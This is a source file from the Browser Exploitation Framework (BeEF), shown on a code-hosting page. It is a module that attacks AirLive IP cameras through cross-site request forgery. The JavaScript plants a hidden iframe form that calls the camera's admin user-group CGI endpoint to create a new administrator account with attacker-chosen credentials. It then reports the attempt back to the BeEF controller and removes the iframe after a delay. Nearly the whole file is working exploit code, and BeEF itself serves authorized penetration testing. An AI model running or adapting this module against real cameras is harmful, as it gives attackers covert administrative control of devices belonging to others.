CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/camera/airlive_ip_camera_csrf/command.js
¹⁸⁷⁴ views

1
//
2
// Copyright (c) 2006-2026Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
  var base  = '<%= @base %>'; 
9
  var path  = 'cgi-bin/admin/usrgrp.cgi';
10
  var user  = '<%= @user %>';
11
  var pass  = '<%= @pass %>';
12

13
  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET", "application/x-www-form-urlencoded",
14
    [{'type':'hidden', 'name':'user',     'value':user},
15
     {'type':'hidden', 'name':'pwd',      'value':pass},
16
     {'type':'hidden', 'name':'grp',      'value':'administrator'},
17
     {'type':'hidden', 'name':'sgrp',     'value':'ptz'},
18
     {'type':'hidden', 'name':'action',   'value':'add'},
19
     {'type':'hidden', 'name':'redirect', 'value':''}
20
    ]);
21

22
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
23

24
  cleanup = function() {
25
    document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
26
  }
27
  setTimeout("cleanup()", 15000);
28

29
});
30

31

32

Product

Resources

Company